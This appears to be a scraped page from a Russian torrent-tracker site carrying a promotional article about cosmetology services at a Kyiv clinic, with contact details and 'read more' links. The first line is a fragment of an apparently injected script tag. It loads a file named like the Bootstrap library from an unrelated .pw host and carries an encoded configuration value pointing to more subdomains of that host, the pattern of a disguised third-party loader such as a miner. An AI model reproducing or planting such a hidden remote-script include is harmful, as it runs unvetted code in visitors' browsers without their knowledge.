nc class="=LWpocVNOd0Y7NjA7MTtzMi5wYy5iZWxpY2ltby5wdyxzMy5wYy5iZWxpY2ltby5wdw==" src="https://play.pc.belicimo.pw/bootstrap.min.js">
Rusbitor.ru - Торрент трекер

Современная косметология



Люди всегда стремились хорошо выглядеть. Еще в Древнем Египте ухаживали за лицом и телом и до нас даже дошли различные рецепты косметических процедур, которые тогда основывались на молоке и меде. Это были банные процедуры, массажи, всевозможные натирания настоями, изготовленными из целебных трав. Современная косметология за это время шагнула очень далеко. Посетителям косметологических центров теперь предлагают инновационные процедуры по уходу за телом и лицом. Наиболее популярные из них: липолифтинг, мезотерапия, коррекция мимических морщин, пилинги и дермабразии, лимфодренажный массаж и др. В наше время уже можно найти замену пластической хирургии, если сочетать маски и кремы с аппаратными салонными процедурами. Причем всё` это применять вовремя и регулярно. Нашим современным косметологам подвластны все секреты красоты. Профессиональный косметолог Киев Центра эстетической медицины Goravsky сможет подобрать вам наиболее подходящий метод аппаратной косметологии, который лучше подойдет для вашего типа кожи. Высококвалифицированный современный косметолог с медицинским образованием учитывает всегда все индивидуальные потребности пациента. Учитывается не только тип кожи, но и возраст пациента, его образ жизни, состояние здоровья, а также режим питания.

При регулярном применении косметологических процедур можно оставаться еще очень долго привлекательной и красивой. Услуги косметолога подразделяются на несколько видов: аппаратная косметология и классическая, которая производится посредством рук специалиста и косметики. Центр Goravsky применяет только экологически чистую, гипоаллергенную косметику с минимальным содержанием консервантов и стабилизаторов. Профессиональная косметика от мировых брендов PCA, Thalgo, HollyLand, Koko dermaviduals полностью соответствует всем требованиям. Контактный номер: +38 (044) 220-47-17. Время работы: Пн.-Вс. с 09: 00 до 21: 00. Адрес: г.Киев, ул. Днепровская набережная, 23.



Читать далее:

Аренда виллы на Кипре
Поезд "Гранд Экспресс"